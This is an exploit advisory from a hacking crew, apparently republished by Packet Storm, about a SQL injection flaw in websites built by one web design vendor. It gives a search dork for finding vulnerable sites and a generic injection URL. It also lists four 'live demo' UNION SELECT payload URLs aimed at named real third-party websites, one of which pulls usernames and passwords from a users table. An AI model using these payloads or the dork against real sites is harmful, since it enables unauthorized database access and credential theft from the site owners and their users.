SayItOnTheWeb Solutions suffered from a remote SQL injection vulnerability. The vendor reported to us on 03/14/2012 that this issue is now resolved.
113f97d47efafb13ba0095b9a41d602a53da9387bf5ecaeb67cc8aaa45ccc015=========================================================================
SayItOnTheWeb Solutions SQL-i Vulnerability
==========================================================================
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+= +=+=+=
+=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+=
+=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+=
+=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+=
+=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+=
+=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+=
+=+=+= |_____________________|+=+=+=
+=+=+= +=+=+=
+=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+=
+=+=+= +=+=+=
+=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+= +=+=+=
+=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Title :.......SayItOnTheWeb Solutions SQL-i Vulnerability
[+]Author :......**RoAd_KiLlEr**
[+]Tested on :...Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com/author/2447 & http://road-killer.blogspot.com
[~] Vendor: http://www.sayitontheweb.com
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] DORK: inurl:php?id= SayItOnTheWeb
[+] Description:
From services such as logo design, web and print design, billboards, to full advertising campaigns and even computer repair and networking... we are the true definition of "All-In-One". Our customers mean the world to us. We try to show them this by consistently exceeding their expectations with proven talent and solid advice.
We create web sites that our customers can manage themselves without any programming knowledge. This custom internet programming can streamline any business, and sets us far apart from our competition.
[ I ]. SQL-i Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[+++] Important: Every web page developed by SayItOnTheWeb is vulnerable to Sql-Injection.
Use the Dork to find websites,than find any page [.php?id=].
[P0C]: http://127.0.0.1/path/[anyfile].php?id=[SQL INJECTION]
[L!v3 D3m0's]:
http://www.aloufaesthetics.com/newmission.php?id=9+and+1=0+Union+select+1,@@version,3,4--
http://www.theworxband.com/newsarticle.php?id=1+and+1=0+Union+select+1,@@version,3,4,5,6,7,8,9--
http://www.prudentialpremierrealtors.com/agenttemplate.php?id=107+and+1=0+Union+Select+1,2,3,group_concat(username,0x3a,pw)%20from%20users--
http://www.scottishfoundation.org/eventsdetail.php?id=333+and+1=0+Union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
[+] TIME TABLE:
07 May 2011 - Vulnerability discovered.
08 May 2011 - Advisory released.
===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | MaFiTeRRoR | All 1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed